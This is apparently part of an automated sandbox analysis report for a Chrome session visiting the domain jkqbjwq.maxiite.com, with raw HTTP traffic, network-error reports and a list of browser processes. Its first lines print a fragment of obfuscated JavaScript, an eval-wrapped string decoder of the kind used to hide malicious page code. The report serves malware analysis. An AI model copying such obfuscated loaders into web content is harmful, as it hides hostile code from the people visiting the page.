                                                                            2024-12-23 17:48:12 UTC966INData Raw: 6c 65 28 6a 3e 30 29 7b 6b 3d 69 5b 6a 25 66 5d 2b 6b 3b 6a 3d 28 6a 2d 28 6a 25 66 29 29 2f 66 7d 72 65 74 75 72 6e 20 6b 7c 7c 5f 30 78 63 36 35 65 5b 31 31 5d 7d 65 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 68 2c 75 2c 6e 2c 74 2c 65 2c 72 29 7b 72 3d 22 22 3b 66 6f 72 28 76 61 72 20 69 3d 30 2c 6c 65 6e 3d 68 2e 6c 65 6e 67 74 68 3b 69 3c 6c 65 6e 3b 69 2b 2b 29 7b 76 61 72 20 73 3d 22 22 3b 77 68 69 6c 65 28 68 5b 69 5d 21 3d 3d 6e 5b 65 5d 29 7b 73 2b 3d 68 5b 69 5d 3b 69 2b 2b 7d 66 6f 72 28 76 61 72 20 6a 3d 30 3b 6a 3c 6e 2e 6c 65 6e 67 74 68 3b 6a 2b 2b 29 73 3d 73 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 6e 5b 6a 5d 2c 22 67 22 29 2c 6a 29 3b 72 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 5f 30 78 65 34 63
                                                                            Data Ascii: le(j>0){k=i[j%f]+k;j=(j-(j%f))/f}return k||_0xc65e[11]}eval(function(h,u,n,t,e,r){r="";for(var i=0,len=h.length;i<len;i++){var s="";while(h[i]!==n[e]){s+=h[i];i++}for(var j=0;j<n.length;j++)s=s.replace(new RegExp(n[j],"g"),j);r+=String.fromCharCode(_0xe4c
                                                                            2024-12-23 17:48:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                            Data Ascii: 0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.44974535.190.80.14432912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 17:48:13 UTC540OUTOPTIONS /report/v4?s=JaM1TPzdFYBViMywUD4wdPXx%2Fa95Uex4gZZPAeXFyFUHnQVmBW504NPeNMwjsFwmjuWUzjK3WdT4iwdHuFjINyZxJ6eXwtiJpe6a%2FblM4q9Ogb73TPBpaMt794bF9d95bWtCTbZm HTTP/1.1
                                                                            Host: a.nel.cloudflare.com
                                                                            Connection: keep-alive
                                                                            Origin: https://jkqbjwq.maxiite.com
                                                                            Access-Control-Request-Method: POST
                                                                            Access-Control-Request-Headers: content-type
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-23 17:48:14 UTC336INHTTP/1.1 200 OK
                                                                            Content-Length: 0
                                                                            access-control-max-age: 86400
                                                                            access-control-allow-methods: OPTIONS, POST
                                                                            access-control-allow-origin: *
                                                                            access-control-allow-headers: content-length, content-type
                                                                            date: Mon, 23 Dec 2024 17:48:13 GMT
                                                                            Via: 1.1 google
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.44974835.190.80.14432912C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-23 17:48:15 UTC478OUTPOST /report/v4?s=JaM1TPzdFYBViMywUD4wdPXx%2Fa95Uex4gZZPAeXFyFUHnQVmBW504NPeNMwjsFwmjuWUzjK3WdT4iwdHuFjINyZxJ6eXwtiJpe6a%2FblM4q9Ogb73TPBpaMt794bF9d95bWtCTbZm HTTP/1.1
                                                                            Host: a.nel.cloudflare.com
                                                                            Connection: keep-alive
                                                                            Content-Length: 390
                                                                            Content-Type: application/reports+json
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-23 17:48:15 UTC390OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 33 38 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 35 30 2e 31 39 32 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6a 6b 71 62 6a 77 71 2e 6d 61 78 69 69 74 65
                                                                            Data Ascii: [{"age":0,"body":{"elapsed_time":3388,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.21.50.192","status_code":404,"type":"http.error"},"type":"network-error","url":"https://jkqbjwq.maxiite
                                                                            2024-12-23 17:48:16 UTC168INHTTP/1.1 200 OK
                                                                            Content-Length: 0
                                                                            date: Mon, 23 Dec 2024 17:48:15 GMT
                                                                            Via: 1.1 google
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Click to jump to process

                                                                            Target ID:0
                                                                            Start time:12:47:58
                                                                            Start date:23/12/2024
                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                            Imagebase:0x7ff76e190000
                                                                            File size:3'242'272 bytes
                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            Target ID:2
                                                                            Start time:12:48:01
                                                                            Start date:23/12/2024
                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2184,i,6646781013531154719,7133456600072816568,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                            Imagebase:0x7ff76e190000
                                                                            File size:3'242'272 bytes
                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:false

                                                                            Target ID:3
                                                                            Start time:12:48:07
                                                                            Start date:23/12/2024
                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://jkqbjwq.maxiite.com"
                                                                            Imagebase:0x7ff76e190000
                                                                            File size:3'242'272 bytes
                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true

                                                                            No disassembly